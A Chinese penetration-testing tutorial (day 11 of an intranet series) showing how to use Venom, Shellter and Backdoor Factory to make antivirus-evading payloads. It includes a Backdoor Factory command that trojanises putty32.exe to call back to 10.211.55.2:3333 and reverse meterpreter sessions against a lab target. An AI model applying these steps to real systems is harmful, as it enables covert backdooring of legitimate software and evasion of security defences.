免杀框架

1. venom框架

cd venom进入venom文件夹中./venom.sh进入venom框架中

选择2进入windows的payload模块

内网渗透 day11-免杀框架

再次2选择dll的shell编码格式

内网渗透 day11-免杀框架

输入要反弹到的ip地址

内网渗透 day11-免杀框架

输入端口

内网渗透 day11-免杀框架

选择payload

内网渗透 day11-免杀框架

填写生成文件的文件名

内网渗透 day11-免杀框架

选择文件后缀

内网渗透 day11-免杀框架

选择下发方式

内网渗透 day11-免杀框架

这里选择手动下放进行测试,将两个文件复制粘贴到靶机上

内网渗透 day11-免杀框架

运行installer.bat,显示成功反弹meterpreter会话

内网渗透 day11-免杀框架

选择8进入逃避恶意接口检测的payload

内网渗透 day11-免杀框架

接着选择4选择返回meterpreter会话

内网渗透 day11-免杀框架

内网渗透 day11-免杀框架

内网渗透 day11-免杀框架

将bat和ps1放到同一个文件夹下运行bat文件

内网渗透 day11-免杀框架

成功反弹meterpreter会话

内网渗透 day11-免杀框架

2. shelltel框架

windows下直接双击shellter.exe

内网渗透 day11-免杀框架

A:自动选择shellcode

M:手动配置参数

H:help

选择A自动选择shellcode,N不检查当前版本

内网渗透 day11-免杀框架

输入要注入的程序

内网渗透 day11-免杀框架

首先会把pe文件备份到shellter-backups文件夹下,原本的文件被覆盖了。

内网渗透 day11-免杀框架

是否启用隐藏模块(这里选择不启用N)

内网渗透 day11-免杀框架

选择payload模块

内网渗透 day11-免杀框架

输入ip和端口

内网渗透 day11-免杀框架

双击被注入的程序程序

内网渗透 day11-免杀框架

成功反弹会话

内网渗透 day11-免杀框架

3. backdoor factory(BDP)

检测pe文件是否允许注入shellcode

内网渗透 day11-免杀框架

./backdoor.py -f ../putty32.exe -S

-f:要注入的pe文件

-c:code cave(代码裂缝)

-l:代码裂缝⼤⼩

-s:选择使⽤ payload 类型

-S:检测pe文件是否支持注入shellcode

-H:选择回连服务器地址

-P:回连服务器端⼝

-J:使⽤多代码裂缝注⼊

探测可注入的裂缝大小

内网渗透 day11-免杀框架

./backdoor.py -f ../putty32.exe -c -l 200

查看可用的payload

内网渗透 day11-免杀框架

内网渗透 day11-免杀框架

./backdoor.py -f ../putty32.exe -s show

生成免杀pe文件

内网渗透 day11-免杀框架

./backdoor.py -f ../putty32.exe -s iat_reverse_tcp_stager_threaded -H 10.211.55.2 -P 3333 -J -o payload.exe

成功运行putty32并且反弹会话

内网渗透 day11-免杀框架

内网渗透 day11-免杀框架

相关文章:

  • 2021-12-15
  • 2021-09-27
  • 2022-01-12
  • 2021-06-15
  • 2021-08-25
  • 2022-03-07
  • 2022-12-23
  • 2022-12-23
猜你喜欢
  • 2021-12-05
  • 2022-02-23
  • 2021-12-04
  • 2022-01-30
  • 2021-11-18
  • 2021-05-11
  • 2022-01-17
相关资源
相似解决方案